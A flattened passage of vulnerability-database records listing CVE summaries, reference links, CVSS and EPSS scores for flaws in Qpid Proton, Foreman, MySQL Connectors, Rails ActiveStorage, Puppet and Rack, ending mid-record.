url VCID-6xkf-evrx-pyau
vulnerability_id VCID-6xkf-evrx-pyau
summary 
Exposure of Sensitive Information to an Unauthorized Actor
The (1) proton.reactor.Connector, (2) proton.reactor.Container, and (3) proton.utils.BlockingConnection classes in Apache Qpid Proton before 0.12.1 improperly use an unencrypted connection for an amqps URI scheme when SSL support is unavailable, which might allow man-in-the-middle attackers to obtain sensitive information or modify data via unspecified vectors.
references
0
reference_url http://lists.fedoraproject.org/pipermail/package-announce/2016-April/182414.html
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.fedoraproject.org/pipermail/package-announce/2016-April/182414.html
1
reference_url http://packetstormsecurity.com/files/136403/Apache-Qpid-Proton-0.12.0-SSL-Failure.html
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://packetstormsecurity.com/files/136403/Apache-Qpid-Proton-0.12.0-SSL-Failure.html
2
reference_url http://qpid.apache.org/releases/qpid-proton-0.12.1/release-notes.html
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://qpid.apache.org/releases/qpid-proton-0.12.1/release-notes.html
3
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-2166.json
reference_id
reference_type
scores
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-2166.json
4
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-2166
reference_id
reference_type
scores
0
value 0.00271
scoring_system epss
scoring_elements 0.50599
published_at 2026-04-13T12:55:00Z
1
value 0.00271
scoring_system epss
scoring_elements 0.50504
published_at 2026-04-01T12:55:00Z
2
value 0.00271
scoring_system epss
scoring_elements 0.5056
published_at 2026-04-02T12:55:00Z
3
value 0.00271
scoring_system epss
scoring_elements 0.50588
published_at 2026-04-04T12:55:00Z
4
value 0.00271
scoring_system epss
scoring_elements 0.50541
published_at 2026-04-07T12:55:00Z
5
value 0.00271
scoring_system epss
scoring_elements 0.50596
published_at 2026-04-08T12:55:00Z
6
value 0.00271
scoring_system epss
scoring_elements 0.50593
published_at 2026-04-09T12:55:00Z
7
value 0.00271
scoring_system epss
scoring_elements 0.50635
published_at 2026-04-11T12:55:00Z
8
value 0.00271
scoring_system epss
scoring_elements 0.50613
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-2166
5
reference_url https://git-wip-us.apache.org/repos/asf?p=qpid-proton.git%3Bh=a058585
reference_id
reference_type
scores
url https://git-wip-us.apache.org/repos/asf?p=qpid-proton.git%3Bh=a058585
6
reference_url https://git-wip-us.apache.org/repos/asf?p=qpid-proton.git;h=a058585
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://git-wip-us.apache.org/repos/asf?p=qpid-proton.git;h=a058585
7
reference_url https://issues.apache.org/jira/browse/PROTON-1157
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://issues.apache.org/jira/browse/PROTON-1157
8
reference_url https://lists.apache.org/thread.html/914424e4d798a340f523b6169aaf39b626971d9bb00fcdeb1d5d6c0d@%3Ccommits.qpid.apache.org%3E
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/914424e4d798a340f523b6169aaf39b626971d9bb00fcdeb1d5d6c0d@%3Ccommits.qpid.apache.org%3E
9
reference_url https://lists.apache.org/thread.html/914424e4d798a340f523b6169aaf39b626971d9bb00fcdeb1d5d6c0d%40%3Ccommits.qpid.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/914424e4d798a340f523b6169aaf39b626971d9bb00fcdeb1d5d6c0d%40%3Ccommits.qpid.apache.org%3E
10
reference_url http://www.securityfocus.com/archive/1/537864/100/0/threaded
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.securityfocus.com/archive/1/537864/100/0/threaded
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1320842
reference_id 1320842
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1320842
12
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:qpid_proton:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:apache:qpid_proton:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:qpid_proton:*:*:*:*:*:*:*:*
13
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:23:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:23:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:23:*:*:*:*:*:*:*
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-2166
reference_id CVE-2016-2166
reference_type
scores
0
value 5.8
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:P/A:N
1
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
2
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-2166
15
reference_url https://github.com/advisories/GHSA-f5cf-f7px-xpmh
reference_id GHSA-f5cf-f7px-xpmh
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-f5cf-f7px-xpmh
fixed_packages
aliases CVE-2016-2166, GHSA-f5cf-f7px-xpmh
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6xkf-evrx-pyau
17
url VCID-73c1-6ytd-ykf9
vulnerability_id VCID-73c1-6ytd-ykf9
summary foreman: SQL injection due to improper handling of the widget id parameter
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1096.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1096.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-1096
reference_id
reference_type
scores
0
value 0.00315
scoring_system epss
scoring_elements 0.54516
published_at 2026-04-01T12:55:00Z
1
value 0.00315
scoring_system epss
scoring_elements 0.54587
published_at 2026-04-02T12:55:00Z
2
value 0.00315
scoring_system epss
scoring_elements 0.54611
published_at 2026-04-04T12:55:00Z
3
value 0.00315
scoring_system epss
scoring_elements 0.5458
published_at 2026-04-07T12:55:00Z
4
value 0.00315
scoring_system epss
scoring_elements 0.54632
published_at 2026-04-08T12:55:00Z
5
value 0.00315
scoring_system epss
scoring_elements 0.54627
published_at 2026-04-09T12:55:00Z
6
value 0.00315
scoring_system epss
scoring_elements 0.54639
published_at 2026-04-11T12:55:00Z
7
value 0.00315
scoring_system epss
scoring_elements 0.54622
published_at 2026-04-12T12:55:00Z
8
value 0.00315
scoring_system epss
scoring_elements 0.546
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-1096
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1561061
reference_id 1561061
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1561061
fixed_packages
aliases CVE-2018-1096
risk_score 3.0
exploitability 0.5
weighted_severity 5.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-73c1-6ytd-ykf9
18
url VCID-7v7q-8wa6-hff5
vulnerability_id VCID-7v7q-8wa6-hff5
summary 
Improper Access Control
A vulnerability in the MySQL Connectors component of Oracle MySQL exists. Successful attacks of this vulnerability can result in takeover of MySQL Connectors.
references
0
reference_url https://access.redhat.com/errata/RHSA-2019:1545
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-10-02T18:16:07Z/
url https://access.redhat.com/errata/RHSA-2019:1545
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-3258.json
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-3258.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-3258
reference_id
reference_type
scores
0
value 0.04126
scoring_system epss
scoring_elements 0.88634
published_at 2026-04-09T12:55:00Z
1
value 0.04126
scoring_system epss
scoring_elements 0.88583
published_at 2026-04-01T12:55:00Z
2
value 0.04126
scoring_system epss
scoring_elements 0.88592
published_at 2026-04-02T12:55:00Z
3
value 0.04126
scoring_system epss
scoring_elements 0.88639
published_at 2026-04-13T12:55:00Z
4
value 0.04126
scoring_system epss
scoring_elements 0.88638
published_at 2026-04-12T12:55:00Z
5
value 0.04126
scoring_system epss
scoring_elements 0.88646
published_at 2026-04-11T12:55:00Z
6
value 0.04126
scoring_system epss
scoring_elements 0.88609
published_at 2026-04-04T12:55:00Z
7
value 0.04126
scoring_system epss
scoring_elements 0.88611
published_at 2026-04-07T12:55:00Z
8
value 0.04126
scoring_system epss
scoring_elements 0.88629
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-3258
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://security.netapp.com/advisory/ntap-20181018-0002
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181018-0002
5
reference_url https://security.netapp.com/advisory/ntap-20181018-0002/
reference_id
reference_type
scores
0
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-10-02T18:16:07Z/
url https://security.netapp.com/advisory/ntap-20181018-0002/
6
reference_url http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-10-02T18:16:07Z/
url http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
7
reference_url http://www.securityfocus.com/bid/105589
reference_id
reference_type
scores
0
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-10-02T18:16:07Z/
url http://www.securityfocus.com/bid/105589
8
reference_url http://www.securitytracker.com/id/1041888
reference_id
reference_type
scores
0
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-10-02T18:16:07Z/
url http://www.securitytracker.com/id/1041888
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1640615
reference_id 1640615
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1640615
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-3258
reference_id CVE-2018-3258
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-3258
11
reference_url https://github.com/advisories/GHSA-4vrv-ch96-6h42
reference_id GHSA-4vrv-ch96-6h42
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4vrv-ch96-6h42
12
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2018-3258, GHSA-4vrv-ch96-6h42
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7v7q-8wa6-hff5
19
url VCID-895a-ydc5-zfg6
vulnerability_id VCID-895a-ydc5-zfg6
summary 
Circumvention of file size limits in ActiveStorage
There is a vulnerability in ActiveStorage's S3 adapter that allows the Content-Length of a direct file upload to be modified by an end user.

Versions Affected:  rails < 5.2.4.2, rails < 6.0.3.1
Not affected:       Applications that do not use the direct upload functionality of the ActiveStorage S3 adapter.
Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1

Impact
------

Utilizing this vulnerability, an attacker can control the Content-Length of an S3 direct upload URL without receiving a new signature from the server. This could be used to bypass controls in place on the server to limit upload size.

Workarounds
-----------

This is a low-severity security issue. As such, no workaround is necessarily until such time as the application can be upgraded.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8162.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8162.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8162
reference_id
reference_type
scores
0
value 0.01549
scoring_system epss
scoring_elements 0.81411
published_at 2026-04-13T12:55:00Z
1
value 0.01549
scoring_system epss
scoring_elements 0.81418
published_at 2026-04-12T12:55:00Z
2
value 0.01549
scoring_system epss
scoring_elements 0.81378
published_at 2026-04-04T12:55:00Z
3
value 0.01549
scoring_system epss
scoring_elements 0.81431
published_at 2026-04-11T12:55:00Z
4
value 0.01549
scoring_system epss
scoring_elements 0.81409
published_at 2026-04-09T12:55:00Z
5
value 0.01549
scoring_system epss
scoring_elements 0.81405
published_at 2026-04-08T12:55:00Z
6
value 0.01549
scoring_system epss
scoring_elements 0.81376
published_at 2026-04-07T12:55:00Z
7
value 0.01549
scoring_system epss
scoring_elements 0.81347
published_at 2026-04-01T12:55:00Z
8
value 0.01549
scoring_system epss
scoring_elements 0.81356
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8162
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
5
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
7
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
8
reference_url https://github.com/aws/aws-sdk-ruby
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/aws/aws-sdk-ruby
9
reference_url https://github.com/aws/aws-sdk-ruby/issues/2098
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/aws/aws-sdk-ruby/issues/2098
10
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activestorage/CVE-2020-8162.yml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activestorage/CVE-2020-8162.yml
11
reference_url https://groups.google.com/forum/#!topic/rubyonrails-security/PjU3946mreQ
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/rubyonrails-security/PjU3946mreQ
12
reference_url https://groups.google.com/g/rubyonrails-security/c/PjU3946mreQ
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://groups.google.com/g/rubyonrails-security/c/PjU3946mreQ
13
reference_url https://hackerone.com/reports/789579
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://hackerone.com/reports/789579
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8162
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-8162
15
reference_url https://www.debian.org/security/2020/dsa-4766
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2020/dsa-4766
16
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1843005
reference_id 1843005
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1843005
17
reference_url https://github.com/advisories/GHSA-m42x-37p3-fv5w
reference_id GHSA-m42x-37p3-fv5w
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m42x-37p3-fv5w
18
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
fixed_packages
aliases CVE-2020-8162, GHSA-m42x-37p3-fv5w
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-895a-ydc5-zfg6
20
url VCID-8xgm-pabz-hkeg
vulnerability_id VCID-8xgm-pabz-hkeg
summary 
Improper Privilege Management
In previous versions of Puppet Agent it was possible to install a module with world writable permissions. Puppet Agent 5.3.4 and 1.10.10 included a fix to this vulnerability.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-10689.json
reference_id
reference_type
scores
0
value 2.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-10689.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-10689
reference_id
reference_type
scores
0
value 0.00092
scoring_system epss
scoring_elements 0.25828
published_at 2026-04-11T12:55:00Z
1
value 0.00092
scoring_system epss
scoring_elements 0.25819
published_at 2026-04-09T12:55:00Z
2
value 0.00092
scoring_system epss
scoring_elements 0.2577
published_at 2026-04-08T12:55:00Z
3
value 0.00092
scoring_system epss
scoring_elements 0.25699
published_at 2026-04-07T12:55:00Z
4
value 0.00092
scoring_system epss
scoring_elements 0.25728
published_at 2026-04-13T12:55:00Z
5
value 0.00092
scoring_system epss
scoring_elements 0.25786
published_at 2026-04-12T12:55:00Z
6
value 0.00092
scoring_system epss
scoring_elements 0.2593
published_at 2026-04-04T12:55:00Z
7
value 0.00092
scoring_system epss
scoring_elements 0.25887
published_at 2026-04-02T12:55:00Z
8
value 0.00092
scoring_system epss
scoring_elements 0.25827
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-10689
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10689
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10689
4
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
5
reference_url https://github.com/puppetlabs/puppet
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/puppetlabs/puppet
6
reference_url https://github.com/puppetlabs/puppet/commit/17d9e02da3882e44c1876e2805cf9708481715ee
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/puppetlabs/puppet/commit/17d9e02da3882e44c1876e2805cf9708481715ee
7
reference_url https://github.com/puppetlabs/puppet/commit/2f1047f85e22cde139a421bc25d371f2ffc92cb1
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/puppetlabs/puppet/commit/2f1047f85e22cde139a421bc25d371f2ffc92cb1
8
reference_url https://tickets.puppetlabs.com/browse/PUP-7866
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://tickets.puppetlabs.com/browse/PUP-7866
9
reference_url https://usn.ubuntu.com/3567-1
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3567-1
10
reference_url https://usn.ubuntu.com/3567-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/3567-1/
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1542850
reference_id 1542850
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1542850
12
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=890412
reference_id 890412
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=890412
13
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-10689
reference_id CVE-2017-10689
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-10689
14
reference_url https://puppet.com/security/cve/CVE-2017-10689
reference_id CVE-2017-10689
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements
1
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://puppet.com/security/cve/CVE-2017-10689
15
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2017-10689.yml
reference_id CVE-2017-10689.YML
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2017-10689.yml
16
reference_url https://github.com/advisories/GHSA-vw22-465p-8j5w
reference_id GHSA-vw22-465p-8j5w
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vw22-465p-8j5w
17
reference_url https://usn.ubuntu.com/USN-4804-1/
reference_id USN-USN-4804-1
reference_type
scores
url https://usn.ubuntu.com/USN-4804-1/
fixed_packages
aliases CVE-2017-10689, GHSA-vw22-465p-8j5w
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8xgm-pabz-hkeg
21
url VCID-8zkw-y3yd-yuft
vulnerability_id VCID-8zkw-y3yd-yuft
summary 
Directory traversal in Rack::Directory app bundled with Rack
A directory traversal vulnerability exists in rack < 2.2.0 that allows an attacker perform directory traversal vulnerability in the Rack::Directory app that is bundled with Rack which could result in information disclosure.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8161.json
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8161.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8161
reference_id
reference_type
scores
0
value 0.00907
scoring_system epss
scoring_elements 0.75759
published_at 2026-04-13T12:55:00Z
1
value 0.00907
scoring_system epss
scoring_elements 0.75765
published_at 2026-04-12T12:55:00Z
2
value 0.00907
scoring_system epss
scoring_elements 0.75784
published_at 2026-04-11T12:55:00Z
3
value 0.00907
scoring_system epss
scoring_elements 0.7576
published_at 2026-04-09T12:55:00Z
4
value 0.00907
scoring_system epss
scoring_elements 0.75749
published_at 2026-04-08T12:55:00Z
5
value 0.00907
scoring_system epss
scoring_elements 0.75735
published_at 2026-04-04T12:55:00Z
6
value 0.00907
scoring_system epss
scoring_elements 0.75705
published_at 2026-04-02T12:55:00Z
7
value 0.00907
scoring_system epss
scoring_elements 0.75703
published_at 2026-04-01T12:55:00Z
8
value 0.00907
scoring_system epss
scoring_elements 0.75715
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8161
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8161
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8161
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/rack/rack
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
